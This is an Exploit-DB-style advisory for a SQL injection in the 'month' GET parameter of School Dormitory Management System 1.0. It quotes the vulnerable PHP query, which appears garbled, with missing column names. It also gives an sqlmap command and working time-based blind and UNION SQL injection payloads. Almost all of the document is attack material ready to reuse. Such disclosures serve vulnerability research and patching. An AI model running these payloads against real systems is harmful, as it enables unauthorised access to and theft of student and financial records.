# Exploit Title: School Dormitory Management System - 'month' SQL Injection  
# Date: 08/05/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage:  
# Software Link:  
# Version: 1.0  
# Tested on: XAMPP, Linux  
# Vulnerable Code  
line 59 in file "/dms/admin/reports/daily_collection_report.php"  
$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, as dorm, as `room` from payment_list p inner join account_list a on p.account_id = inner join student_list s on a.student_id = inner join room_list r on a.room_id = inner join dorm_list d on r.dorm_id = where (p.month_of) = '{$month}' order by student asc ");  
# Sqlmap command:  
sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta  
# Output:  
Parameter: month (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report